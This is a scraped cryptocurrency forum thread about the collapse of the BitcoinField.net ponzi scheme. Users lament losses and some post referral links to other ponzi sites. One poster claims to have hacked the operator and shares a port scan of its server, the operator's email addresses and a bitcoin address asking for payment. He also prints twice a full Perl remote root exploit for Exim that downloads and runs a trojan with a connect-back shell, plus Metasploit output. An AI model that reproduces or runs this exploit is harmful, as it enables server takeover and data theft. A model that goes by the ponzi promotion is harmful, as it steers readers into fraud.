My loss is not much in this bitcoinfield.net but still there is loss. But my loss is more in the below two sites
clclc.net
freegetbitcoin.com/
These two sites didn't even pay couple of days for the users. The run with our money.
Topic: ★★★ BitcoinField.Net - 10% Daily Forever ★★★ - 0.0005 BTC Min / Legal Company (Read 21450 times)
May 05, 2015, 01:23:22 AM
May 05, 2015, 12:59:08 AM
Nice work man, u got all his personal info.
So who has the money now? If the "hacker" it has i hope he will refund everyone. And take .5 or 1 btc for hisself. Anyways, this is lol.
Scammer gets hacked! Yolo
So who has the money now? If the "hacker" it has i hope he will refund everyone. And take .5 or 1 btc for hisself. Anyways, this is lol.
Scammer gets hacked! Yolo
May 05, 2015, 12:54:16 AM
May 04, 2015, 09:27:40 PM
hehe i told u dont fucking play with me ! 
where is u "ponzi" now ?
some infos to public
http://pastebin.com/VGcARfGe
ORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
26/tcp closed rsftp
53/tcp open tcpwrapped
80/tcp open http nginx
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd
443/tcp open http nginx
465/tcp open ssl/smtp Exim smtpd 4.85
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
3306/tcp open mysql MySQL (unauthorized)
8080/tcp closed http-proxy
nice 465/tcp open ssl/smtp Exim smtpd 4.85
code of exploit in perl:
msf core...
some screenshot
http://s21.postimg.org/jrb4prl6f/Screenshot_from_2015_05_05_23_29_37.png
some problem if u have i cant windraw all here
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
wellcome speedy1987 in me world
dont sarching me i have 20 firewole 10 nat and 5 vps hahah.
now u all cant windraw u monet but if u dont have skills...
this is public adres BTC:112QrMgXdaYdSS3n2NnnNWris8feJuQvBk i cant windraw u all people money just put here 0.5 btc ist promotion ! now i go to sleep good night all !
pozdrowienia ! polish elite hacker team
where is u "ponzi" now ?
some infos to public
http://pastebin.com/VGcARfGe
ORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
26/tcp closed rsftp
53/tcp open tcpwrapped
80/tcp open http nginx
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd
443/tcp open http nginx
465/tcp open ssl/smtp Exim smtpd 4.85
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
3306/tcp open mysql MySQL (unauthorized)
8080/tcp closed http-proxy
nice 465/tcp open ssl/smtp Exim smtpd 4.85
code of exploit in perl:
Code:
#Exim 4.85 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope
#Modified perl version of metasploit module
=for comment
use this connect back shell as "trojanurl" and be sure to setup a netcat,
---snip---
$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include
#include
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);
}
};
close FILE;
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
system($system);
---snip---
=cut
use IO::Socket;
if ($#ARGV ne 3) {
print "./eximxpl \n";
print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n";
exit;
}
$|=1;
$trojan = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$helohost = "abcde.com";
$max_msg = 52428800;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => 'tcp');
while(<$sock>) {
print;
if ($_ =~ /220 /) { last;}
}
print $sock "EHLO $helohost\r\n";
while(<$sock>) {
print;
if ($_ =~ /250-SIZE (\d+)/) {
$max_msg = $1;
print "Set size to $max_msg !\n";
}
if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) {
$revdns = $1;
$saddr = $2;
}
if ($_ =~ /250 /) { last;}
}
if ($revdns eq $helohost) {
$vv = "";
} else {
$vv = $revdns. " ";
}
$vv .= "(" . $helohost . ")";
$from = "root\@local.com";
$to = "postmaster\@localhost";
$msg_len = $max_msg + 1024*256;
$logbuffer_size = 8192;
$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";
$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";
$filler = "V" x (8 * 16);
$logbuffer_size -= 3;
for ($k=0;$k<60;$k++) {
if (length($logbuffer) >= $logbuffer_size) {last;}
$hdr = sprintf("Header%04d: %s\n", $k, $filler);
$newlen = length($logbuffer) + length($hdr);
if ($newlen > $logbuffer_size) {
$newlen -= $logbuffer_size;
$off = length($hdr) - $newlen - 2 - 1;
$hdr = substr($hdr, 0, $off);
$hdr .= "\n";
}
$hdrs .= $hdr;
$logbuffer .= " " . $hdr;
}
$hdrx = "HeaderX: ";
$k2 = 3;
for ($k=1;$k<=200;$k++) {
if ($k2 > 12) {
$k2 = 3;
}
# $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} ";
$hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} ";
$k2++;
}
$v = "A" x 255 . "\n";
$body = "";
while (length($body) < $msg_len) {
$body .= $v;
}
$body = substr($body, 0, $msg_len);
print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
$v = <$sock>;
print $v;
print $sock "DATA\r\n";
$v = <$sock>;
print $v;
print "Sending large buffer, please wait...\n";
print $sock $hdrs;
print $sock $hdrx . "\n";
print $sock $body;
print $sock "\r\n.\r\n";
$v = <$sock>;
print $v;
print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
while(1){};
#Modified perl version of metasploit module
=for comment
use this connect back shell as "trojanurl" and be sure to setup a netcat,
---snip---
$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include
#include
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);
}
};
close FILE;
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
system($system);
---snip---
=cut
use IO::Socket;
if ($#ARGV ne 3) {
print "./eximxpl
print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n";
exit;
}
$|=1;
$trojan = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$helohost = "abcde.com";
$max_msg = 52428800;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => 'tcp');
while(<$sock>) {
print;
if ($_ =~ /220 /) { last;}
}
print $sock "EHLO $helohost\r\n";
while(<$sock>) {
print;
if ($_ =~ /250-SIZE (\d+)/) {
$max_msg = $1;
print "Set size to $max_msg !\n";
}
if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) {
$revdns = $1;
$saddr = $2;
}
if ($_ =~ /250 /) { last;}
}
if ($revdns eq $helohost) {
$vv = "";
} else {
$vv = $revdns. " ";
}
$vv .= "(" . $helohost . ")";
$from = "root\@local.com";
$to = "postmaster\@localhost";
$msg_len = $max_msg + 1024*256;
$logbuffer_size = 8192;
$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";
$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";
$filler = "V" x (8 * 16);
$logbuffer_size -= 3;
for ($k=0;$k<60;$k++) {
if (length($logbuffer) >= $logbuffer_size) {last;}
$hdr = sprintf("Header%04d: %s\n", $k, $filler);
$newlen = length($logbuffer) + length($hdr);
if ($newlen > $logbuffer_size) {
$newlen -= $logbuffer_size;
$off = length($hdr) - $newlen - 2 - 1;
$hdr = substr($hdr, 0, $off);
$hdr .= "\n";
}
$hdrs .= $hdr;
$logbuffer .= " " . $hdr;
}
$hdrx = "HeaderX: ";
$k2 = 3;
for ($k=1;$k<=200;$k++) {
if ($k2 > 12) {
$k2 = 3;
}
# $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} ";
$hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} ";
$k2++;
}
$v = "A" x 255 . "\n";
$body = "";
while (length($body) < $msg_len) {
$body .= $v;
}
$body = substr($body, 0, $msg_len);
print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
$v = <$sock>;
print $v;
print $sock "DATA\r\n";
$v = <$sock>;
print $v;
print "Sending large buffer, please wait...\n";
print $sock $hdrs;
print $sock $hdrx . "\n";
print $sock $body;
print $sock "\r\n.\r\n";
$v = <$sock>;
print $v;
print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
while(1){};
msf core...
Code:
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...\
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
http://metasploit.pro
Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]]
+ -- --=[ 1389 exploits - 788 auxiliary - 223 post ]
+ -- --=[ 356 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search Exim
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/linux/smtp/exim4_dovecot_exec 2015-01-03 excellent Exim and Dovecot Insecure Configuration Command Injection
exploit/unix/smtp/exim4_string_format 2013-12-07 excellent Exim4 string_format Function Heap Buffer Overflow
msf >
[*] Starting the Metasploit Framework console...\
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
http://metasploit.pro
Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]]
+ -- --=[ 1389 exploits - 788 auxiliary - 223 post ]
+ -- --=[ 356 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search Exim
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/linux/smtp/exim4_dovecot_exec 2015-01-03 excellent Exim and Dovecot Insecure Configuration Command Injection
exploit/unix/smtp/exim4_string_format 2013-12-07 excellent Exim4 string_format Function Heap Buffer Overflow
msf >
some screenshot
http://s21.postimg.org/jrb4prl6f/Screenshot_from_2015_05_05_23_29_37.png
some problem if u have i cant windraw all here
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
wellcome speedy1987 in me world
dont sarching me i have 20 firewole 10 nat and 5 vps hahah.
now u all cant windraw u monet but if u dont have skills...
this is public adres BTC:112QrMgXdaYdSS3n2NnnNWris8feJuQvBk i cant windraw u all people money just put here 0.5 btc ist promotion ! now i go to sleep good night all !
pozdrowienia ! polish elite hacker team
May 04, 2015, 05:26:41 PM
100% scam rite?
No one can hack they wallet? Lol
No one can hack they wallet? Lol
May 03, 2015, 09:04:13 PM
OK I am so lost now. What's going on?
May 03, 2015, 06:36:31 PM
For a while.....i kind of think you where for real 
May 03, 2015, 06:00:02 PM
Are you for real?! ;
May 03, 2015, 04:42:16 PM
That would be beautiful, even if i don't have my money back, at least it would be a dream come true if it would't end in the hands of this scammers, because we all knew that some day they were going to stop paying, but when that day comes they also should stop accepting investments, thats dirty game.
May 03, 2015, 03:31:36 PM
I love u guys ! if u can hack him maybe u can help me get my money back
May 03, 2015, 09:33:33 AM
He has whois guard, any other ways to get his ip?
I may have to ask administrators?no.
May 03, 2015, 09:24:41 AM
He has whois guard, any other ways to get his ip?
May 03, 2015, 08:07:46 AM
@5m4ru1
Bitcoinfield.net don't use CloudFlare see http://whois.domaintools.com/190.115.24.246 .
About EarnTomorrow i know only that they are registred as EARN LTD
Here are documents from the EU Companies House (European corporations registration)about EARN LTD.
https://ShareSync.serverdata.net/Web/s/5F4VX5L6A79V_1QOGJJPIS
Bitcoinfield.net don't use CloudFlare see http://whois.domaintools.com/190.115.24.246 .
About EarnTomorrow i know only that they are registred as EARN LTD
Here are documents from the EU Companies House (European corporations registration)about EARN LTD.
https://ShareSync.serverdata.net/Web/s/5F4VX5L6A79V_1QOGJJPIS
May 03, 2015, 07:54:10 AM
Earntomorrow is SCAM i lost 5btc there just see the post from https://bitcointalk.org/index.php?topic=1018509.340
but aprilcoin is paying and profit12 is paying and also invcrypt is paying
but aprilcoin is paying and profit12 is paying and also invcrypt is paying
May 03, 2015, 07:49:35 AM
From my previous experience (on 5 diff occasions). Whenever withdrawals suddenly start 'pending', when they used to be instant. That means the outgoing funds are now > incoming funds, and the ponzi can't sustain, and the site will collapse imminently
In other words, usually it means game over
Hope I'm wrong this time
In other words, usually it means game over
Hope I'm wrong this time
Same here but luckily on 4 occasions, (surely the rest will follow anytimes) , i invested everywhere seeming "legit" like 120btc, earndaily, bitc-i24, 14daily.. well sometimes it works but there's still some hope mr. speedy comes back after a four days weekend, and fixes it.
but https://www.aprilcoin.com/?ref=larson and https://earntomorrow.com/?ref=larson are still paying (for long!)
its at ours to keep it running and to indirectly support the scam we scream about afterwards
May 03, 2015, 05:53:01 AM
See my signature. Hourly profit program and instant withdraw.
May 03, 2015, 02:02:38 AM
Registration Date: Apr-16-2015
Last Access: May-2-2015 04:09:15 PM
Account Balance: ฿0.00000556
฿0.00000556 of BitCoin
Earned Total: ฿0.00050795
Pending Withdrawal: ฿0.00017000
Withdrew Total: ฿0.00018000
Active Deposit: ฿0.00065238
Last Deposit: ฿0.00065238 Apr-23-2015 05:24:25 AM
Total Deposit: ฿0.00065238
Last Withdrawal: ฿0.00018000 Apr-28-2015 06:50:56 AM
Withdrew Total: ฿0.00018000
The problem is:I waited to long before I invested...with ponzi never wait too long...each second counts.
Last Access: May-2-2015 04:09:15 PM
Account Balance: ฿0.00000556
฿0.00000556 of BitCoin
Earned Total: ฿0.00050795
Pending Withdrawal: ฿0.00017000
Withdrew Total: ฿0.00018000
Active Deposit: ฿0.00065238
Last Deposit: ฿0.00065238 Apr-23-2015 05:24:25 AM
Total Deposit: ฿0.00065238
Last Withdrawal: ฿0.00018000 Apr-28-2015 06:50:56 AM
Withdrew Total: ฿0.00018000
The problem is:I waited to long before I invested...with ponzi never wait too long...each second counts.
May 02, 2015, 10:37:17 PM
We all know one day these kind of sites will disappear but still we thought we can make some profit and jumped in to program. Here some made profit and some lose.
So this is a gone case - either we need to move on to next one or stop investing in this kind investments.
So this is a gone case - either we need to move on to next one or stop investing in this kind investments.
May 02, 2015, 08:35:47 PM
turnover and only time in vain jerk this guy
May 02, 2015, 08:20:45 PM
i gotvpending wd too..
Lost 50% of my investment here..
Lost 50% of my investment here..
Jump to: